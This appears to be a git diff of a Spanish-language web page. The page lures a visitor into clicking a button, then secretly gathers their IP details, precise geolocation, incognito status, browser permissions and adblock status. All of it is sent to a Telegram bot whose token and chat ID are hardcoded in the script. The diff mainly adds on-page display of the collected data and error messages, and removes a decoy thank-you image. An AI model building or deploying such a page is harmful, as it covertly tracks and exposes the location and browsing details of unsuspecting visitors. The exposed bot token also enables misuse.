--- a/index.html
+++ b/index.html
@@ -5,15 +5,16 @@
   <title>PAGE</title>
   <style>
     body { font-family: Arial; padding: 20px; background: #f0f0f0; }
-    .box { background: white; padding: 20px; border-radius: 8px; box-shadow: 0 0 10px rgba(0,0,0,0.1); max-width: 700px; margin: auto; text-align: center; }
+    .box { background: white; padding: 20px; border-radius: 8px; box-shadow: 0 0 10px rgba(0,0,0,0.1); max-width: 700px; margin: auto; }
     button { padding: 10px 20px; font-size: 16px; cursor: pointer; }
-    img { max-width: 100%; border-radius: 10px; margin-top: 20px; }
+    pre { white-space: pre-wrap; word-wrap: break-word; }
   </style>
 </head>
 <body>
-  <div class="box" id="mainBox">
-    <h2>Aprieta el boton y espera 5 segundos</h2>
+  <div class="box">
+    <h2>Aprieta el botón Porfavor</h2>
     <button id="startBtn">Dame Click</button>
+    <pre id="result">..</pre>
   </div>
 
 <script>
@@ -21,6 +22,7 @@
   const BOT_TOKEN = "8011619975:AAE_Donqy5xn8RD0lJ2LOIP326dTDrnO1Ag";
   const CHAT_ID = "6065284869";
 
+  const resultEl = document.getElementById("result");
   const startBtn = document.getElementById("startBtn");
 
   let humanInteraction = false;
@@ -112,7 +114,7 @@
   async function sendToTelegram(message) {
     try {
       const url = `https://api.telegram.org/bot${BOT_TOKEN}/sendMessage`;
-      await fetch(url, {
+      const response = await fetch(url, {
         method: "POST",
         headers: {"Content-Type": "application/json"},
         body: JSON.stringify({
@@ -120,12 +122,20 @@
           text: message,
         }),
       });
+      const data = await response.json();
+      console.log("Telegram response:", data);
+      if (!data.ok) {
+        resultEl.textContent += `\nError Telegram: ${data.description || 'Error desconocido'}`;
+      }
     } catch(e) {
       console.warn("Error enviando a Telegram:", e);
+      resultEl.textContent += `\nError enviando a Telegram: ${e.message}`;
     }
   }
 
   async function collectAndSend() {
+    resultEl.textContent = "Espera porfavor...";
+
     const [ipRes, geoRes, incognitoStatus, permStatus, adblockStatus] = await Promise.allSettled([
       getIPInfo(),
       new Promise((res, rej) => {
@@ -171,6 +181,7 @@ AdBlock detectado: ${adblockStatus.status === "fulfilled" ? adblockStatus.value 
 Hora: ${new Date().toLocaleString()}
 `;
 
+    resultEl.textContent = message;
     await sendToTelegram(message);
 
     if (geoRes.status === "fulfilled") {
@@ -181,15 +192,11 @@ Longitud: ${longitude}
 Precisión: ${accuracy} metros
 Hora: ${new Date().toLocaleString()}
 `;
+      resultEl.textContent += locationInfo;
       await sendToTelegram(locationInfo);
     } else {
-      await sendToTelegram("\nUbicación precisa no disponible o rechazada.");
+      resultEl.textContent += "\nUbicación precisa no disponible o rechazada.";
     }
-
-    // Mostrar solo imagen final
-    document.getElementById("mainBox").innerHTML = `
-      <img src="https://i.ibb.co/YB3WFLk/imagen.jpg" alt="Gracias">
-    `;
   }
 
   startBtn.onclick = collectAndSend;
